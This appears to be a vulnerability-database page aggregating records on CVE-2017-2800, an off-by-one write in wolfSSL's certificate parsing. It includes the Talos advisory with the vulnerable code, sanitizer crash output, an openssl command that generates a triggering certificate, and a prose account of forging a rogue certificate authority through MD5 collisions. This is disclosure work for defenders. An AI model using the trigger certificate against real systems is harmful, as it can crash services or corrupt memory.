Vulnerabilities > CVE-2017-2800 - Improper Certificate Validation vulnerability in Wolfssl
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
A specially crafted x509 certificate can cause a single out of bounds byte overwrite in wolfSSL through 3.10.2 resulting in potential certificate validation vulnerabilities, denial of service and possible remote code execution. In order to trigger this vulnerability, the attacker needs to supply a malicious x509 certificate to either a server or a client application using this library.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Creating a Rogue Certificate Authority Certificate An attacker exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the "to be signed" part. The attacker specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The attacker then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the attacker which is signed with its private key. An attacker then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the attackers' second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the attacker is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the attacker and of course any certificates that it signs. So the attacker is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec) .
Exploit-Db
| description | wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One. CVE-2017-2800. Dos exploit for Multiple platform. Tags: Denial of Service (DoS) |
| file | exploits/multiple/dos/41984.txt |
| id | EDB-ID:41984 |
| last seen | 2017-05-09 |
| modified | 2017-05-09 |
| platform | multiple |
| port | |
| published | 2017-05-09 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/41984/ |
| title | wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One |
| type | dos |
Seebug
| bulletinFamily | exploit |
| description | ### Summary An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL library versions up to 3.10.2. A specially crafted x509 certificate can cause a single out of bounds byte overwrite resulting in potential certificate validation vulnerabilities, denial of service and possible remote code execution. In order to trigger this vulnerability, the attacker needs to supply a malicious x509 certificate to either server or client application using this library. ### Tested Versions WolfSSL 3.10.2 ### Product URLs https://www.wolfssl.com ### CVSSv3 Score 8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-193: Off-by-one Error ### Details WolfSSL, previously CyaSSL, is a lightweight SSL/TLS library targeted for embedded and RTOS environments, primarily because of its small size, speed, portability, and feature set. According to the vendor it is used in wide range of products including industrial control systems, IoT devices, VoIP hardware, routers and more. The vulnerability exists in x509 code that deals with string fields in DER certificates. Specifically, when parsing `commonName`, `countryName`, `localityName`, `stateName`, `orgName` or orgUnit fields, the function `wolfSSL_X509_NAME_get_text_by_NID` is used. Its prototype is: ``` int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name, int nid, char* buf, int len); ``` Its task is to copy the appropriate string from `name` context into supplied `buf` of length `len`. The issue happens when the string is longer or equal to length of the allocated buffer. Following code highlights the issue for the case of `commonName` field: ``` int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name, int nid, char* buf, int len) { char *text = NULL; int textSz = 0; WOLFSSL_ENTER("wolfSSL_X509_NAME_get_text_by_NID"); switch (nid) { case ASN_COMMON_NAME: text = name->fullName.fullName + name->fullName.cnIdx; [1] textSz = name->fullName.cnLen; [2] break; ... if (buf != NULL && text != NULL) { textSz = min(textSz, len); [3] XMEMCPY(buf, text, textSz); [4] buf[textSz] = '\0'; [5] } ``` At [1] and [2], `text` and `textSz` are initialized. At [3] the lesser of the two values `textSz` and `len` is chosen. This value ends up as the size parameter to a `memcpy` call at [4]. Then, the same value is used as an index to NULL terminate the string at [5]. If the string length is bigger than size of the allocated buffer, NULL termination at index `textSz` will cause an off-by-one NULL byte write into adjacent memory variable on the stack or heap, depending on where the buffer was allocated. Depending on the way the library is used, this could lead to further issues when doing certificate validation or potentially result in remote code execution. The vulnerability can be triggered by supplying the attached PoC x509 certificate to the certfileds example app from wolfssl-examples. ### Crash Information ``` Address sanitizer output: ==97602==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffe1a0 at pc 0x7ffff7b73f56 bp 0x7fffffff8410 sp 0x7fffffff8408 WRITE of size 1 at 0x7fffffffe1a0 thread T0 #0 0x7ffff7b73f55 in wolfSSL_X509_NAME_get_text_by_NID wolfssl/src/ssl.c:12458 #1 0x7ffff7b73f55 in ?? ??:0 #2 0x4ea99d in main wolfssl/wolfssl-examples/certfields/main.c:128 #3 0x4ea99d in ?? ??:0 #4 0x7ffff6afe82f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291 #5 0x7ffff6afe82f in ?? ??:0 #6 0x418c48 in _start ??:? #7 0x418c48 in ?? ??:0 Address 0x7fffffffe1a0 is located in stack of thread T0 at offset 23872 in frame #0 0x4ea2af in main wolfssl/wolfssl-examples/certfields/main.c:44 #1 0x4ea2af in ?? ??:0 This frame has 10 object(s): [32, 14128) 'derCert' [14384, 14388) 'idx' [14400, 23280) 'pubKey' [23536, 23544) 'cert' [23568, 23648) 'commonName' [23680, 23760) 'countryName' [23792, 23872) 'localityName' <== Memory access at offset 23872 overflows this variable [23904, 23984) 'stateName' [24016, 24096) 'orgName' [24128, 24208) 'orgUnit' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/lib/libwolfssl.so.3+0x184f55) Shadow bytes around the buggy address: 0x10007fff7be0: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 0x10007fff7bf0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x10007fff7c00: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 0x10007fff7c10: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 0x10007fff7c20: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00 =>0x10007fff7c30: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00 0x10007fff7c40: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x10007fff7c50: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 f3 f3 0x10007fff7c60: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==97602==ABORTING ``` ### Exploit Proof-of-Concept A certificate that triggers this vulnerability can be generated using the following `openssl` command: ``` openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert1.pem -days 365 -subj "/C=US/ST=Maryland/L=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/O=E/CN=A" ``` ### Timeline * 2017-03-14 - Vendor Disclosure * 2017-05-04 - Public Release ### CREDIT * Discovered by Aleksandar Nikolic of Cisco Talos. |
| id | SSV:96519 |
| last seen | 2017-11-19 |
| modified | 2017-09-18 |
| published | 2017-09-18 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-96519 |
| title | WolfSSL library X509 Certificate Text Parsing Code Execution Vulnerability(CVE-2017-2800) |
Talos
| id | TALOS-2017-0293 |
| last seen | 2019-05-29 |
| published | 2017-05-04 |
| reporter | Talos Intelligence |
| source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0293 |
| title | WolfSSL library X509 Certificate Text Parsing Code Execution Vulnerability |